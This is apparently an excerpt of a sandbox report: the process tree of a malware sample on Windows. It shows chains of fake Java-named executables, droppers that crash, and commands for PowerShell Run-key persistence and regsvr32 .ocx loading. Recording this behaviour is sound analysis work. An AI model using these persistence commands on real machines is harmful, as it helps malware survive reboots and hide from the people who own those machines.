        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        153⤵
        
        PID:9876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        154⤵
        
        PID:11020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        155⤵
        
        PID:12132
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        156⤵
        
        PID:13304
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        157⤵
        
        PID:14012
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        158⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        159⤵
        
        PID:13860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        160⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        161⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        162⤵
        
        PID:2900

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:7428

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:11268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe"
1⤵
PID:10800
- C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
  2⤵
  PID:10676
- - C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
    3⤵
    PID:14324
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      4⤵
      PID:11128
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        5⤵
        
        PID:11888
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        6⤵
        
        PID:11340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        7⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        8⤵
        
        PID:13544
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        9⤵
        
        PID:13628
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        10⤵
        
        PID:13212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        11⤵
        
        PID:13588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        12⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        13⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        14⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        15⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        16⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        17⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        18⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        19⤵
        
        PID:6580
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        20⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        21⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        22⤵
        
        PID:7720
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        23⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        24⤵
        
        PID:9488
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        25⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        26⤵
        
        PID:7784
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        27⤵
        
        PID:7868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        28⤵
        
        PID:8228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        29⤵
        
        PID:8472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        30⤵
        
        PID:8704
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        31⤵
        
        PID:8988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        32⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        33⤵
        
        PID:8432
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        34⤵
        
        PID:9336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        35⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        36⤵
        
        PID:9252
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        37⤵
        
        PID:9640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        38⤵
        
        PID:9952
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        39⤵
        
        PID:9828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        40⤵
        
        PID:9688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        41⤵
        
        PID:11440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        42⤵
        
        PID:11240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        43⤵
        
        PID:10096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        44⤵
        
        PID:10064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        45⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        46⤵
        
        PID:9512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        47⤵
        
        PID:13056
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        48⤵
        
        PID:11100
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        49⤵
        
        PID:9996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        50⤵
        
        PID:11648
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice.exe"
        51⤵
        Modifies registry key
        
        PID:13640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe\"'"
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe"
1⤵
PID:5124
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
  2⤵
  PID:2604
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
    3⤵
    PID:5652
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
      4⤵
      PID:1640
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        5⤵
        
        PID:13148
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        6⤵
        
        PID:6648
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        7⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        8⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        9⤵
        
        PID:8004
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        10⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        11⤵
        
        PID:8180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        12⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        13⤵
        
        PID:8728
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        14⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        15⤵
        
        PID:9044
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        16⤵
        
        PID:9068
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        17⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        18⤵
        
        PID:3356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        19⤵
        
        PID:12260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        20⤵
        
        PID:9588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        21⤵
        
        PID:9816
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        22⤵
        
        PID:9572
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        23⤵
        
        PID:9792
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        24⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        25⤵
        
        PID:9972
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        26⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        27⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        28⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        29⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        30⤵
        
        PID:1256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        31⤵
        
        PID:10344
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        32⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        33⤵
        
        PID:11768
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        34⤵
        
        PID:12732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        35⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        36⤵
        
        PID:11896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        37⤵
        
        PID:12512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        38⤵
        
        PID:13752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        39⤵
        
        PID:8776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        40⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        41⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        42⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        43⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        44⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        45⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        46⤵
        
        PID:9404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        47⤵
        
        PID:9256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        48⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        49⤵
        
        PID:6696
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        50⤵
        
        PID:12084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        51⤵
        
        PID:11968
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        52⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        53⤵
        
        PID:6168
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        54⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        55⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        56⤵
        
        PID:11596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        57⤵
        
        PID:9224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        58⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        59⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        60⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        61⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        62⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        63⤵
        
        PID:7384
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        64⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        65⤵
        
        PID:7248
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        66⤵
        
        PID:8148
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        67⤵
        
        PID:8360
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        68⤵
        
        PID:8568
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        69⤵
        
        PID:9496
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupportw.exe"
        70⤵
        Modifies registry key
        
        PID:10576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupportw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe\"'"
        70⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5884

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:12352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe"
1⤵
PID:10788
- C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
  2⤵
  PID:1276
- - C:\Windows\system32\reg.exe
    reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupportw.exe"
    3⤵
    - Modifies registry key
    PID:6568

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:11004

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:13508

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:9240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\bHt28Zow\leYmMnjYfY2zaADV.exe
1⤵
PID:2132
- C:\Users\Admin\AppData\Local\Temp\bHt28Zow\leYmMnjYfY2zaADV.exe
  C:\Users\Admin\AppData\Local\Temp\bHt28Zow\leYmMnjYfY2zaADV.exe
  2⤵
  PID:22972
- - C:\Users\Admin\AppData\Local\Temp\BjpVgohP\3jBYtxjvNgkiRFOT.exe
    C:\Users\Admin\AppData\Local\Temp\BjpVgohP\3jBYtxjvNgkiRFOT.exe 22972
    3⤵
    PID:23284
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 23284 -s 232
      4⤵
      Program crash
      PID:16884
- - C:\Users\Admin\AppData\Local\Temp\bHt28Zow\G0TSdD9nBAD56CZu.exe
    C:\Users\Admin\AppData\Local\Temp\bHt28Zow\G0TSdD9nBAD56CZu.exe 22972
    3⤵
    PID:6732
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 664
      4⤵
      Program crash
      PID:20404
- - C:\Users\Admin\AppData\Local\Temp\bHt28Zow\1jTAaqLCjHj4tpun.exe
    C:\Users\Admin\AppData\Local\Temp\bHt28Zow\1jTAaqLCjHj4tpun.exe 22972
    3⤵
    PID:19972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 19972 -s 960
      4⤵
      Program crash
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\bHt28Zow\Qu1rnvS6ukJqe8e8.exe
    C:\Users\Admin\AppData\Local\Temp\bHt28Zow\Qu1rnvS6ukJqe8e8.exe 22972
    3⤵
    PID:21888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 21888 -s 660
      4⤵
      Program crash
      PID:19376
- - C:\Users\Admin\AppData\Local\Temp\bHt28Zow\rLzadCK9Z1kbnr7z.exe
    C:\Users\Admin\AppData\Local\Temp\bHt28Zow\rLzadCK9Z1kbnr7z.exe 22972
    3⤵
    PID:23240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 23240 -s 792
      4⤵
      Program crash
      PID:12684
- - C:\Users\Admin\AppData\Local\Temp\bHt28Zow\YOlWsUadaeYp6skm.exe
    C:\Users\Admin\AppData\Local\Temp\bHt28Zow\YOlWsUadaeYp6skm.exe 22972
    3⤵
    PID:6980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 500
      4⤵
      Program crash
      PID:19344
- - C:\Users\Admin\AppData\Local\Temp\bHt28Zow\ZluwL3MyPMC00Sqb.exe
    C:\Users\Admin\AppData\Local\Temp\bHt28Zow\ZluwL3MyPMC00Sqb.exe 22972
    3⤵
    PID:22032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 9020 -ip 9020
1⤵
PID:16540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 23284 -ip 23284
1⤵
PID:23956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 12232 -ip 12232
1⤵
PID:30916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 31244 -ip 31244
1⤵
PID:31640

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:32596
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
  2⤵
  PID:20036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7760

